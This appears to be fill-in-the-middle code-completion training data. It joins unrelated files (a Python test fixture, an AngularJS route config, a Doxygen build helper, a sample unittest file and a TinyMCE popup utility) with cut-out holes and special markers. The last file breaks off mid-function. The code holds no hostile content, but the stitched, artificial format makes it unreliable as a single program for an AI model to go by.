<|file_name|>test_fixture_creation.py<|end_file_name|><|fim▁begin|>from __future__ import absolute_import
from unittest import TestCase
from datetime import datetime, timedelta
from voeventdb.server.tests.fixtures import fake, packetgen
class TestBasicRoutines(TestCase):
def setUp(self):
self.start = datetime(2015, 1, 1)
self.interval = timedelta(minutes=15)
def test_timerange(self):
n_interval_added = 5
times = [t for t in
packetgen.timerange(self.start,
self.start+self.interval*n_interval_added,
self.interval)]
self.assertEqual(n_interval_added, len(times))
self.assertEqual(self.start, times[0])
def test_heartbeat(self):
n_interval = 4*6
packets = fake.heartbeat_packets(self.start, self.interval,
n_interval)<|fim▁hole|><|fim▁end|> | self.assertEqual(n_interval, len(packets)) |
<|file_name|>app.js<|end_file_name|><|fim▁begin|>'use strict';
'use strict';
angular.module('appModule', [ 'ngRoute', 'appControllers' ])
.config(function($routeProvider) {
$routeProvider.when('/home', {<|fim▁hole|> controller : 'PostCodeCtrl',
templateUrl : '/views/postcode/list.html'
}).when('/postcode/:id', {
controller : 'PostCodeEditCtrl',
templateUrl : '/views/postcode/detail.html'
}).otherwise({
redirectTo : '/home'
});
});<|fim▁end|> | controller : 'SettingCtrl',
templateUrl : '/views/public/setting.html'
}).when('/postcodes', { |
<|file_name|>doxygen.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
# -*- python -*-
#BEGIN_LEGAL
#
#Copyright (c) 2016 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#END_LEGAL
############################################################################
## START OF IMPORTS SETUP
############################################################################
import sys
import os
import re
import copy
import glob
import types
try:
from . import base
from . import dag
from . import util
from . import plan
except:
s = "\nXED ERROR: mfile.py could not find mbuild." + \
" Should be a sibling of the xed2 directory.\n\n"
sys.stderr.write(s)
sys.exit(1)
###########################################################################
## DOXYGEN SUPPORT
###########################################################################
def _doxygen_version_okay(s, want_major, want_minor, want_fix):
values = s.split('.')
maj =int(values[0])
minor = int(values[1])
fix = 0
if len(values) > 2:
# remove everything after the dash for things like: 'Doxygen
# 1.5.1-p1'
values[2] = re.sub(r'-.*$','',values[2])
try:
fix = int(values[2])
except ValueError as v:
pass
if (maj > want_major) or \
(maj == want_major and minor > want_minor) or \
(maj == want_major and minor == want_minor and fix >= want_fix):
return True
return False
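# Illustrative check (values are hypothetical): _doxygen_version_okay('1.5.1-p1', 1, 4, 6)
# returns True, since 1.5.x >= 1.4.6 and the '-p1' suffix is stripped before int().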
def _find_doxygen(env):
"""Find the right version of doxygen. Return a tuple of the
command name and a boolean indicating whether or not the version
checked out."""
if env['doxygen_cmd'] == '':
doxygen_cmd_intel = "/usr/intel/bin/doxygen"
doxygen_cmd_cygwin = "C:/cygwin/bin/doxygen"
doxygen_cmd_mac = \
"/Applications/Doxygen.app/Contents/Resources/doxygen"
doxygen_cmd = "doxygen"
if env['build_os'] == 'win':
if os.path.exists(doxygen_cmd_cygwin):
doxygen_cmd = doxygen_cmd_cygwin
else:
base.msgb('DOXYGEN',"Could not find cygwin's doxygen," +
"trying doxygen from PATH")
elif env['build_os'] == 'lin':
if base.verbose(2):
base.msgb("CHECKING FOR", doxygen_cmd_intel)
if os.path.exists(doxygen_cmd_intel):
doxygen_cmd = doxygen_cmd_intel
elif env['build_os'] == 'mac':
if base.verbose(2):
base.msgb("CHECKING FOR", doxygen_cmd_mac)
if os.path.exists(doxygen_cmd_mac):
doxygen_cmd = doxygen_cmd_mac
else:
doxygen_cmd = env['doxygen_cmd']
doxygen_cmd = env.escape_string(doxygen_cmd)
doxygen_okay = False
if base.verbose(2):
base.msgb('Checking doxygen version','...')
if base.check_python_version(2,4):
try:
(retval, output, error_output) = \
util.run_command(doxygen_cmd + " --version")
if retval==0:
if len(output) > 0:
first_line = output[0].strip()
if base.verbose(2):
base.msgb("Doxygen version", first_line)
doxygen_okay = _doxygen_version_okay(first_line, 1,4,6)
else:
for o in output:
base.msgb("Doxygen-version-check STDOUT", o)
if error_output:
for line in error_output:
base.msgb("STDERR ",line.rstrip())
except:
base.die("Doxygen required by the command line options " +
"but no doxygen found")
return (doxygen_cmd, doxygen_okay)
def _replace_match(istring, mtch, newstring, group_name):
"""This is a lame way of avoiding regular expression backslashing
issues"""
x1= mtch.start(group_name)
x2= mtch.end(group_name)
ostring = istring[0:x1] + newstring + istring[x2:]
return ostring
def _customize_doxygen_file(env, subs):
"""Change the $(*) strings to the proper value in the config file.
Returns True on success"""
# doxygen wants quotes around paths with spaces
for k,s in iter(subs.items()):
if re.search(' ',s):
if not re.search('^".*"$',s):
base.die("Doxygen requires quotes around strings with spaces: [%s]->[%s]" %
( k,s))
return False
# input and output files
try:
lines = open(env['doxygen_config']).readlines()
except:
base.msgb("Could not open input file: " + env['doxygen_config'])
return False
env['doxygen_config_customized'] = \
env.build_dir_join(os.path.basename(env['doxygen_config']) + '.customized')
try:
ofile = open(env['doxygen_config_customized'],'w')
except:
base.msgb("Could not open output file: " + env['doxygen_config_customized'])
return False
# compile the patterns
rsubs = {}
for k,v in iter(subs.items()):
rsubs[k]=re.compile(r'(?P<tag>[$][(]' + k + '[)])')
olines = []
for line in lines:
oline = line
for k,p in iter(rsubs.items()):
#print ('searching for', k, 'to replace it with', subs[k])
m = p.search(oline)
while m:
#print ('replacing', k, 'with', subs[k])
oline = _replace_match(oline, m, subs[k], 'tag')
m = p.search(oline)
olines.append(oline)
try:
for line in olines:
ofile.write(line)
except:
ofile.close()
base.msgb("Could not write output file: " + env['doxygen_config_customized'])
return False
ofile.close()
return True
def _build_doxygen_main(args, env):
"""Customize the doxygen input file. Run the doxygen command, copy
in any images, and put the output in the right place."""
if isinstance(args, list):
if len(args) < 2:
base.die("Need subs dictionary and dummy file arg for the doxygen command " +
"to indicate its processing")
else:
base.die("Need a list for _build_doxygen_main with the subs " +
"dictionary and the dummy file name")
(subs,dummy_file) = args
(doxygen_cmd, doxygen_okay) = _find_doxygen(env)
if not doxygen_okay:
msg = 'No good doxygen available on this system; ' + \
'Your command line arguments\n\trequire it to be present. ' + \
'Consider dropping the "doc" and "doc-build" options\n\t or ' + \
'specify a path to doxygen with the --doxygen knob.\n\n\n'
return (1, [msg]) # failure
else:
env['DOXYGEN'] = doxygen_cmd
try:
okay = _customize_doxygen_file(env, subs)
except:
base.die("CUSTOMIZE DOXYGEN INPUT FILE FAILED")
if not okay:
return (1, ['Doxygen customization failed'])
cmd = env['DOXYGEN'] + ' ' + \
env.escape_string(env['doxygen_config_customized'])
if base.verbose(2):
base.msgb("RUN DOXYGEN", cmd)
(retval, output, error_output) = util.run_command(cmd)
for line in output:
base.msgb("DOX",line.rstrip())
if error_output:
for line in error_output:
base.msgb("DOX-ERROR",line.rstrip())
if retval != 0:
base.msgb("DOXYGEN FAILED")
base.die("Doxygen run failed. Retval=", str(retval))
util.touch(dummy_file)
base.msgb("DOXYGEN","succeeded")
return (0, []) # success
###########################################################################
# Doxygen build
###########################################################################
def _empty_dir(d):
"""return True if the directory d does not exist or if it contains no
files/subdirectories."""
if not os.path.exists(d):
return True
for (root, subdirs, subfiles) in os.walk(d):
if len(subfiles) or len(subdirs):
return False
return True
def _make_doxygen_reference_manual(env, doxygen_inputs, subs, work_queue,
hash_file_name='dox'):
"""Install the doxygen reference manual the doyxgen_output_dir
directory. doxygen_inputs is a list of files """
dox_dag = dag.dag_t(hash_file_name,env=env)
# so that the scanner can find them
dirs = {}
for f in doxygen_inputs:
dirs[os.path.dirname(f)]=True
for d in dirs.keys():
env.add_include_dir(d)
# make sure the config and top file are in the inptus list
doxygen_inputs.append(env['doxygen_config'])
doxygen_inputs.append(env['doxygen_top_src'])
dummy = env.build_dir_join('dummy-doxygen-' + hash_file_name)<|fim▁hole|> # Run it via the builder to make it dependence driven
run_always = False
if _empty_dir(env['doxygen_install']):
run_always = True
if run_always:
_build_doxygen_main([subs,dummy], env)
else:
c1 = plan.plan_t(command=_build_doxygen_main,
args= [subs,dummy],
env= env,
input= doxygen_inputs,
output= dummy)
dox1 = dox_dag.add(env,c1)
okay = work_queue.build(dag=dox_dag)
phase = "DOXYGEN"
if not okay:
base.die("[%s] failed. dying..." % phase)
if base.verbose(2):
base.msgb(phase, "build succeeded")
############################################################
def doxygen_env(env):
"""Add the doxygen variables to the environment"""
doxygen_defaults = dict( doxygen_config='',
doxygen_top_src='',
doxygen_install='',
doxygen_cmd='' )
env.update_dict(doxygen_defaults)
def doxygen_args(env):
"""Add the knobs to the command line knobs parser"""
env.parser.add_option("--doxygen-install",
dest="doxygen_install",
action="store",
default='',
help="Doxygen installation directory")
env.parser.add_option("--doxygen-config",
dest="doxygen_config",
action="store",
default='',
help="Doxygen config file")
env.parser.add_option("--doxygen-top-src",
dest="doxygen_top_src",
action="store",
default='',
help="Doxygen top source file")
env.parser.add_option("--doxygen-cmd",
dest="doxygen_cmd",
action="store",
default='',
help="Doxygen command name")
def doxygen_run(env, inputs, subs, work_queue, hash_file_name='dox'):
"""Run doxygen assuming certain values are in the environment env.
@type env: env_t
@param env: the environment
@type inputs: list
@param inputs: list of input files to scan for dependences
@type subs: dictionary
@param subs: replacements in the config file
@type work_queue: work_queue_t
@param work_queue: a work queue for the build
@type hash_file_name: string
@param hash_file_name: used for the dummy file and mbuild hash suffix
"""
_make_doxygen_reference_manual(env, inputs, subs, work_queue, hash_file_name)<|fim▁end|> | |
<|file_name|>test_foo.py<|end_file_name|><|fim▁begin|>#!/usr/bin/python
import unittest
class FooTest(unittest.TestCase):
'''Sample test case -- FooTest()'''
def setUp(self):
'''Set up for testing...'''
print 'FooTest:setUp_:begin'
testName = self.shortDescription()
if (testName == 'Test routine A'):
print 'setting up for test A'
elif (testName == 'Test routine B'):
print 'setting up for test B'
else:
print 'UNKNOWN TEST ROUTINE'
print 'FooTest:setUp_:end'
def testA(self):
'''Test routine A'''
print 'FooTest: running testA...'
def testB(self):
'''Test routine B'''
print 'FooTest: running testB...'
def tearDown(self):
'''Tear down from testing...'''
print 'FooTest:tearDown_:begin'
testName = self.shortDescription()
if (testName == 'Test routine A'):
print 'cleaning up after test A'
elif (testName == 'Test routine B'):
print 'cleaning up after test B'
else:
print 'UNKNOWN TEST ROUTINE'
print 'FooTest:tearDown_:end'<|fim▁hole|>
class BarTest(unittest.TestCase):
'''Sample test case -- BarTest()'''
def setUp(self):
'''Set up for testing...'''
print 'BarTest:setUp_:begin'
testName = self.shortDescription()
if (testName == 'Test routine A'):
print 'setting up for test A'
elif (testName == 'Test routine B'):
print 'setting up for test B'
else:
print 'UNKNOWN TEST ROUTINE'
print 'BarTest:setUp_:end'
def testA(self):
'''Test routine A'''
print 'BarTest: running testA...'
def testB(self):
'''Test routine B'''
print 'BarTest: running testB...'
def tearDown(self):
'''Tear down from testing...'''
print 'BarTest:tearDown_:begin'
testName = self.shortDescription()
if (testName == 'Test routine A'):
print 'cleaning up after test A'
elif (testName == 'Test routine B'):
print 'cleaning up after test B'
else:
print 'UNKNOWN TEST ROUTINE'
print 'BarTest:tearDown_:end'
if __name__ == '__main__':
unittest.main()<|fim▁end|> | |
<|file_name|>popup_utils.js<|end_file_name|><|fim▁begin|>/*
eZ Online Editor MCE popup : common js code used in popups
Created on: <06-Feb-2008 00:00:00 ar>
Copyright (c) 1999-2014 eZ Systems AS
Licensed under the GPL 2.0 License:
http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
*/
var eZOEPopupUtils = {
embedObject: {},
settings: {
// optional css class to add to tag when we save ( does not replace any class selectors you have)
cssClass: '',
// the ez xml name of the tag
tagName: '',
// optional a checkbox / dropdown that selects the tag type
tagSelector: false,
// optional custom callback function called when tagSelector changes
tagSelectorCallBack: false,
// optional a function to generate the html for the tag ( on create in save() )
tagGenerator: false,
// optional a function to do cleanup after tag has been created ( after create in save() )
onTagGenerated: false,
// optional function to edit the tag ( on edit in save() )
tagEditor: false,
// optional function to generate attribute
attributeGenerator: {},
// optional custom function to handle setting attributes on element edit and create
tagAttributeEditor: false,
// form id that save() is attached to
form: '',
// optional canel button that cancel function is attached to
cancelButton: '',
// content type switch for embed tags
contentType: '',
// internal element in editor ( false on create ), set by init()
editorElement: false,
// event to call on init
onInit: false,
// event to call after init
onInitDone : false,
// events to call after init
onInitDoneArray : [],
// custom attribute to style map to be able to preview style changes
customAttributeStyleMap: false,
// set on init if no editorElement is present and selected text is without newlines
editorSelectedText: false,
// Same as above but with markup
editorSelectedHtml: false,
// the selected node in the editor, set on init
editorSelectedNode: false,
// generates class name for tr elements in browse / search / bookmark list
browseClassGenerator: function(){ return ''; },
// generates browse link for a specific mode
browseLinkGenerator: false,
// custom init function pr custom attribute
customAttributeInitHandler: [],
// custom save function pr custom attribute
customAttributeSaveHandler: [],
// Title text to set on tilte tag and h2#tag-edit-title tag in tag edit / create dialogs
tagEditTitleText: '',
// the default image alias to use while browsing
browseImageAlias: 'small'
},
/**
* Initialize page with values from current editor element or if not defined; default values and settings
*
* @param {Object} settings Hash with settings, is saved to eZOEPopupUtils.settings for the rest of the execution.
*/
init: function( settings )
{
eZOEPopupUtils.settings = jQuery.extend( false, eZOEPopupUtils.settings, settings );
var ed = tinyMCEPopup.editor, el = tinyMCEPopup.getWindowArg('selected_node'), s = eZOEPopupUtils.settings;
if ( !s.selectedTag ) s.selectedTag = s.tagName;
if ( s.form && (s.form = jQuery( '#' + s.form )) )
s.form.submit( eZOEPopupUtils.save );
if ( s.cancelButton && (s.cancelButton = jQuery( '#' + s.cancelButton )) )
s.cancelButton.click( eZOEPopupUtils.cancel );
if ( el && el.nodeName )
{
s.editorElement = el;
if ( s.tagEditTitleText )
{
document.title = s.tagEditTitleText;
jQuery( '#tag-edit-title').html( s.tagEditTitleText );
if ( window.parent && window.parent.ez )
{
// set title on inline popup if inlinepopup tinyMCE plugin is used
var tinyInlinePopupsTitle = window.parent.jQuery('div.clearlooks2');
if ( tinyInlinePopupsTitle && tinyInlinePopupsTitle.size() )
window.parent.document.getElementById( tinyInlinePopupsTitle[0].id + '_title').innerHTML = s.tagEditTitleText;
}
}
}
else
{
var selectedHtml = ed.selection.getContent( {format:'text'} );
if ( !/\n/.test( selectedHtml ) && jQuery.trim( selectedHtml ) !== '' )
s.editorSelectedText = selectedHtml;
selectedHtml = ed.selection.getContent( {format:'html'} );
if ( jQuery.trim( selectedHtml ) !== '' )
s.editorSelectedHtml = selectedHtml;
}
s.editorSelectedNode = ed.selection.getNode();
if ( s.onInit && s.onInit.call )
s.onInit.call( eZOEPopupUtils, s.editorElement, s.tagName, ed );
if ( s.tagSelector && ( s.tagSelector = jQuery( '#' + s.tagSelector ) ) && s.tagSelector.size() && s.tagSelector[0].value
&& ( s.tagSelector[0].checked === undefined || s.tagSelector[0].checked === true ) )
s.selectedTag = s.tagSelector[0].value;
if ( s.editorElement )
{
eZOEPopupUtils.initGeneralmAttributes( s.tagName + '_attributes', s.editorElement );
            eZOEPopupUtils.initCustomAttributeValue( s.selectedTag + '_customattributes', s.editorElement.getAttribute('customattributes') );
}
if ( s.tagSelector && s.tagSelector.size() )
{
// toggle custom attributes based on selected custom tag
if ( s.tagSelectorCallBack && s.tagSelectorCallBack.call )
{
// custom function to call when tag selector change
// 'this' is jQuery object of selector
// first param is event/false and second is element of selector
s.tagSelectorCallBack.call( s.tagSelector, false, s.tagSelector[0] );
s.tagSelector.change( s.tagSelectorCallBack );
}
else
{
// by default tag selector refreshes custom attribute values
eZOEPopupUtils.toggleCustomAttributes.call( s.tagSelector );
s.tagSelector.change( eZOEPopupUtils.toggleCustomAttributes );
}
}
if ( s.onInitDone && s.onInitDone.call )
s.onInitDone.call( eZOEPopupUtils, s.editorElement, s.tagName, ed );
if ( s.onInitDoneArray && s.onInitDoneArray.length )
jQuery.each( s.onInitDoneArray, function( i, fn ){
if ( fn && fn.call )
fn.call( eZOEPopupUtils, s.editorElement, s.tagName, ed );
} );
},
/**
* Save changes from form values to editor element attributes but first:
* - validate values according to class names and stop if not valid
* - create editor element if it does not exist either using callbacks or defaults
* - or call optional edit callback to edit/fixup existing element
* - Set attributes from form values using callback if set or default TinyMCE handler
*/
save: function()
{
        var ed = tinyMCEPopup.editor, s = eZOEPopupUtils.settings, n, arr, tmp, errorArray, f = document.forms[0];
if ( s.tagSelector && s.tagSelector.size() && s.tagSelector[0].value )
{
if ( s.tagSelector[0].checked === undefined || s.tagSelector[0].checked === true )
s.selectedTag = s.tagSelector[0].value;
else if ( s.tagSelector[0].checked === false )
s.selectedTag = s.tagName;
}
// validate the general attributes
if ( (errorArray = AutoValidator.validate( jQuery( '#' + s.tagName + '_attributes' )[0] ) ) && errorArray.length )
{
tinyMCEPopup.alert(tinyMCEPopup.getLang('invalid_data') + "\n" + errorArray.join(", ") );
return false;
}
// validate the custom attributes
if ( (errorArray = AutoValidator.validate( jQuery( '#' + s.selectedTag + '_customattributes' )[0] ) ) && errorArray.length )
{
tinyMCEPopup.alert(tinyMCEPopup.getLang('invalid_data') + "\n" + errorArray.join(", ") );
return false;
}
if ( tinymce.isWebKit )
ed.getWin().focus();
var args = jQuery.extend(
false,
eZOEPopupUtils.getCustomAttributeArgs( s.selectedTag + '_customattributes'),
eZOEPopupUtils.getGeneralAttributeArgs( s.tagName + '_attributes')
);
if ( s.cssClass )
args['class'] = s.cssClass + ( args['class'] ? ' ' + args['class'] : '');
ed.execCommand('mceBeginUndoLevel');
if ( !s.editorElement )
{
// create new node if none is defined and if tag type is defined in ezXmlToXhtmlHash or tagGenerator is defined
if ( s.tagGenerator )
{
s.editorElement = eZOEPopupUtils.insertHTMLCleanly( ed, s.tagGenerator.call( eZOEPopupUtils, s.tagName, s.selectedTag, s.editorSelectedHtml ), '__mce_tmp' );
}
else if ( s.tagCreator )
{
s.editorElement = s.tagCreator.call( eZOEPopupUtils, ed, s.tagName, s.selectedTag, s.editorSelectedHtml );
}
else if ( s.tagName === 'link' )
{
var tempid = args['id'];
args['id'] = '__mce_tmp';
ed.execCommand('mceInsertLink', false, args, {skip_undo : 1} );
s.editorElement = ed.dom.get('__mce_tmp');
// fixup if we are inside embed tag
if ( tmp = eZOEPopupUtils.getParentByTag( s.editorElement, 'div,span', 'ezoeItemNonEditable' ) )
{
var span = document.createElement("span");
span.innerHTML = s.editorElement.innerHTML;
s.editorElement.parentNode.replaceChild(span, s.editorElement);
s.editorElement.innerHTML = '';
tmp.parentNode.insertBefore(s.editorElement, tmp);
s.editorElement.appendChild( tmp );
}
args['id'] = tempid;
}
else if ( eZOEPopupUtils.xmlToXhtmlHash[s.tagName] )
{
s.editorElement = eZOEPopupUtils.insertTagCleanly( ed, eZOEPopupUtils.xmlToXhtmlHash[s.tagName], tinymce.isIE ? ' ' : '<br data-mce-bogus="1" />' );
}
if ( s.onTagGenerated )
{
n = s.onTagGenerated.call( eZOEPopupUtils, s.editorElement, ed, args );
if ( n && n.nodeName )
s.editorElement = n;
}
}
else if ( s.tagEditor )
{
// we already have a element, if custom tagEditor function is defined it can edit it
n = s.tagEditor.call( eZOEPopupUtils, s.editorElement, ed, s.selectedTag, args );
if ( n && n.nodeName )
s.editorElement = n;
}
if ( s.editorElement )
{
if ( s.tagAttributeEditor )
{
n = s.tagAttributeEditor.call( eZOEPopupUtils, ed, s.editorElement, args );
if ( n && n.nodeName )
s.editorElement = n;
}
else
ed.dom.setAttribs( s.editorElement, args );
if ( args['id'] === undefined )
ed.dom.setAttrib( s.editorElement, 'id', '' );
if ( 'TABLE'.indexOf( s.editorElement.tagName ) === 0 )
ed.selection.select( jQuery( s.editorElement ).find( "tr:first-child > *:first-child" ).get(0), true );
else if ( 'DIV'.indexOf( s.editorElement.tagName ) === 0 )
ed.selection.select( s.editorElement );
else
ed.selection.select( s.editorElement, true );
ed.nodeChanged();
}
ed.execCommand('mceEndUndoLevel');
ed.execCommand('mceRepaint');
tinyMCEPopup.close();
return false;
},
/**
     * Inserts raw html and tries to clean up any issues that might occur (related to paragraphs and block tags),
     * making sure block nodes do not break the html structure they are inserted into
*
* @param ed TinyMCE editor instance
* @param {String} html
* @param {String} id
* @return HtmlElement
*/
insertHTMLCleanly: function( ed, html, id )
{
var paragraphCleanup = false, newElement;
if ( html.indexOf( '<div' ) === 0 || html.indexOf( '<pre' ) === 0 )
{
paragraphCleanup = true;
}
ed.execCommand('mceInsertRawHTML', false, html, {skip_undo : 1} );
newElement = ed.dom.get( id );
if ( paragraphCleanup ) this.paragraphCleanup( ed, newElement );
return newElement;
},
/**
     * Only for use with block tags ( appends or prepends the tag relative to the current tag )
*
* @param ed TinyMCE editor instance
* @param {String} tag Tag Name
* @param {String} content Inner content of tag, can be html, but only tested with plain text
* @param {Array} args Optional parameter that is passed as second parameter to ed.dom.setAttribs() if set.
* @return HtmlElement
*/
insertTagCleanly: function( ed, tag, content, args )
{
var edCurrentNode = eZOEPopupUtils.settings.editorSelectedNode ? eZOEPopupUtils.settings.editorSelectedNode : ed.selection.getNode(),
newElement = edCurrentNode.ownerDocument.createElement( tag );
if ( tag !== 'img' ) newElement.innerHTML = content;
if ( edCurrentNode.nodeName === 'TD' )
edCurrentNode.appendChild( newElement );
else if ( edCurrentNode.nextSibling )
edCurrentNode.parentNode.insertBefore( newElement, edCurrentNode.nextSibling );
else if ( edCurrentNode.nodeName === 'BODY' )// IE when editor is empty
edCurrentNode.appendChild( newElement );
else
edCurrentNode.parentNode.appendChild( newElement );
if ( (tag === 'div' || tag === 'pre') && edCurrentNode && edCurrentNode.nodeName.toLowerCase() === 'p' )
{
this.paragraphCleanup( ed, newElement );
}
if ( args ) ed.dom.setAttribs( newElement, args );
return newElement;
},
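    // Usage sketch (hypothetical arguments): insert an empty paragraph after
    // the current selection and set a class on it:
    //   var p = eZOEPopupUtils.insertTagCleanly( ed, 'p', '<br data-mce-bogus="1" />', { 'class': 'intro' } );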
/**
* Cleanup broken paragraphs after inserting block tags into paragraphs
*
* @param ed TinyMCE editor instance
* @param {HtmlElement} el
*/
paragraphCleanup: function( ed, el )
{
        var emptyContent = [ '', '<br>', '<BR>', '&nbsp;', ' ', " " ];
if ( el.previousSibling
&& el.previousSibling.nodeName.toLowerCase() === 'p'
&& ( !el.previousSibling.hasChildNodes() || jQuery.inArray( el.previousSibling.innerHTML, emptyContent ) !== -1 ))
{
el.parentNode.removeChild( el.previousSibling );
}
if ( el.nextSibling
&& el.nextSibling.nodeName.toLowerCase() === 'p'
&& ( !el.nextSibling.hasChildNodes() || jQuery.inArray( el.nextSibling.innerHTML, emptyContent ) !== -1 ))
{
el.parentNode.removeChild( el.nextSibling );
}
},
/**
     * Escapes html special characters in attribute values so they can be used safely
*
* @param {String} value
* @return {String}
*/
safeHtml: function( value )
{
        value = value.replace(/&/g, '&amp;');
        value = value.replace(/\"/g, '&quot;');
        value = value.replace(/</g, '&lt;');
        value = value.replace(/>/g, '&gt;');
return value;
},
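    // Example (assuming the entity escaping above):
    //   eZOEPopupUtils.safeHtml( 'a < "b" & c' ) returns 'a &lt; &quot;b&quot; &amp; c'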
xmlToXhtmlHash: {
'paragraph': 'p',
'literal': 'pre',
'anchor': 'a',
'link': 'a'
},
cancel: function()
{
tinyMCEPopup.close();
},
/**
     * Removes all children of a node safely (especially needed to clear select options and table data)
     * Also disables the tag if it was a select
*
* @param {HtmlElement} node
*/
removeChildren: function( node )
{
if ( !node ) return;
while ( node.hasChildNodes() )
{
node.removeChild( node.firstChild );
}
if ( node.nodeName === 'SELECT' ) node.disabled = true;
},
/**
     * Adds options to a select based on an object with name / value pairs or an array
     * and disables the select tag if no options were added.
*
* @param {HtmlElement} node
* @param {Object|Array} o
*/
addSelectOptions: function( node, o )
{
if ( !node || node.nodeName !== 'SELECT' ) return;
var opt, c = 0, i;
if ( o.constructor.toString().indexOf('Array') === -1 )
{
            for ( var key in o )
{
opt = document.createElement("option");
opt.value = key === '0' || key === '-0-' ? '' : key;
                opt.innerHTML = o[key];
node.appendChild( opt );
c++;
}
}
else
{
for ( i = 0, c = o.length; i < c; i++ )
{
opt = document.createElement("option");
opt.value = opt.innerHTML = o[i];
node.appendChild( opt );
}
}
node.disabled = c === 0;
},
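    // Usage sketch (hypothetical data): object keys become option values and
    // their values become labels (keys '0' and '-0-' map to the empty value),
    // while array entries are used for both value and label:
    //   eZOEPopupUtils.addSelectOptions( node, { '0': 'None', 'left': 'Left' } );
    //   eZOEPopupUtils.addSelectOptions( node, [ 'small', 'medium', 'large' ] );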
/**
* Get custom attribute value from form values and map them to style value as well
*
* @param {HtmlElement} node
* @return {Object} Hash of attributes and their values for use on editor elements
*/
getCustomAttributeArgs: function( node )
{
var args = {
'customattributes': '',
'style': ''
}, s = eZOEPopupUtils.settings, handler = s.customAttributeSaveHandler;
var customArr = [];
jQuery( '#' + node + ' input,#' + node + ' select,#' + node + ' textarea' ).each(function( i, el )
{
var o = jQuery( el ), name = o.attr("name"), value, style;
if ( o.hasClass('mceItemSkip') || !name ) return;
if ( o.attr("type") === 'checkbox' && !o.prop("checked") ) return;
            // see if there is a save handler that needs to do some work on the value
if ( handler[el.id] !== undefined && handler[el.id].call !== undefined )
value = handler[el.id].call( o, el, o.val() );
else
                value = o.val();
            // add to styles if the custom attribute is defined in customAttributeStyleMap
if ( value !== '' && s.customAttributeStyleMap && s.customAttributeStyleMap[name] !== undefined )
{
                // filtered because some browsers (ie, ff & opera) convert the tag to a font tag in certain circumstances
                style = s.customAttributeStyleMap[name];
                if ( /(margin|border|padding|width|height)/.test( style ) )
args['style'] += style + ': ' + value + '; ';
}
customArr.push( name + '|' + value );
});
args['customattributes'] = customArr.join('attribute_separation');
return args;
},
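    // Example of the returned hash (hypothetical form values width=100 and
    // height=50, both assumed to map to style properties in customAttributeStyleMap):
    //   { customattributes: 'width|100attribute_separationheight|50',
    //     style: 'width: 100; height: 50; ' }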
/**
* Get general attributes for tag from form values
*
* @param {HtmlElement} node
* @return {Object} Hash of attributes and their values for use on editor elements
*/
getGeneralAttributeArgs: function( node )
{
var args = {}, handler = eZOEPopupUtils.settings.customAttributeSaveHandler;
jQuery( '#' + node + ' input,#' + node + ' select' ).each(function( i, el )
{
var o = jQuery( el ), name = o.attr("name");
if ( o.hasClass('mceItemSkip') || !name ) return;
if ( o.attr("type") === 'checkbox' && !o.prop("checked") ) return;
            // see if there is a save handler that needs to do some work on the value
if ( handler[el.id] !== undefined && handler[el.id].call !== undefined )
args[name] = handler[el.id].call( o, el, o.val() );
else
                args[name] = o.val();
});
return args;
},
/**
* Get parent tag by tag name with optional class name and type check
*
* @param {HtmlElement} n
* @param {String} tag
* @param {String} className
* @param {String} type
* @param {Boolean} checkElement Checks n as well if true
* @return {HtmlElement|False}
*/
getParentByTag: function( n, tag, className, type, checkElement )
{
if ( className ) className = ' ' + className + ' ';
tag = ',' + tag.toUpperCase() + ',';
while ( n !== undefined && n.nodeName !== undefined && n.nodeName !== 'BODY' )
{
if ( checkElement && tag.indexOf( ',' + n.nodeName + ',' ) !== -1
&& ( !className || (' ' + n.className + ' ').indexOf( className ) !== -1 )
&& ( !type || n.getAttribute('type') === type ) )
{
return n;
}
n = n.parentNode;
checkElement = true;
}
return false;
},
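    // Usage sketch (hypothetical node): find the closest enclosing
    // non-editable embed wrapper, checking the node itself as well:
    //   var embed = eZOEPopupUtils.getParentByTag( el, 'div,span', 'ezoeItemNonEditable', false, true );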
toggleCustomAttributes: function( e )
{
        var node;
        if ( this.each !== undefined )
            node = this;
        else
            node = jQuery( this );
jQuery('table.custom_attributes').each(function( i, el ){
el = jQuery( el );
if ( el.attr('id') === node[0].value + '_customattributes' )
el.show();
else
el.hide();
});
},
/**
     * Sets default values based on the custom attribute value
* global objects: ez
*
* @param string node Element id of parent node for custom attribute form
* @param string valueString The raw customattributes string from attribute
*/
initCustomAttributeValue: function( node, valueString )
{
if ( valueString === null || !document.getElementById( node ) )
return;
var arr = valueString.split('attribute_separation'), values = {}, t, handler = eZOEPopupUtils.settings.customAttributeInitHandler;
for(var i = 0, l = arr.length; i < l; i++)
{
t = arr[i].split('|');
var key = t.shift();
values[key] = t.join('|');
}
jQuery( '#' + node + ' input,#' + node + ' select,#' + node + ' textarea' ).each(function( i, el )
{
var o = jQuery( el ), name = el.name;
if ( o.hasClass('mceItemSkip') || !name )
return;
if ( values[name] !== undefined )
{
if ( handler[el.id] !== undefined && handler[el.id].call !== undefined )
handler[el.id].call( o, el, values[name] );
else if ( el.type === 'checkbox' )
el.checked = values[name] == el.value;
else if ( el.type === 'select-one' )
{
                // Make sure the selection has the value before we set it (#014986)
for( var i = 0, l = el.options.length; i < l; i++ )
{
if ( el.options[i].value == values[name] ) el.value = values[name];
}
}
else
el.value = values[name];
try {
el.onchange();
} catch (ex) {
// Try fire event, ignore errors
}
}
});
},
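    // Example of the raw valueString format parsed above (hypothetical
    // values): 'width|100attribute_separationheight|50' yields
    // { width: '100', height: '50' }, since pairs are joined with the literal
    // string 'attribute_separation' and key/value with '|'.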
initGeneralmAttributes: function( node, editorElement )
{
// init general attributes form values from tinymce element values
var handler = eZOEPopupUtils.settings.customAttributeInitHandler, cssReplace = function( s ){
s = s.replace(/(webkit-[\w\-]+|Apple-[\w\-]+|mceItem\w+|ezoeItem\w+|mceVisualAid)/g, '');
if ( !eZOEPopupUtils.settings.cssClass )
return s;
jQuery.each(eZOEPopupUtils.settings.cssClass.split(' '), function(index, value){
s = s.replace( value, '' );
});
return s;
};
jQuery( '#' + node + ' input,#' + node + ' select' ).each(function( i, el )
{
var o = jQuery( el ), name = el.name, v;
if ( o.hasClass('mceItemSkip') ) return;
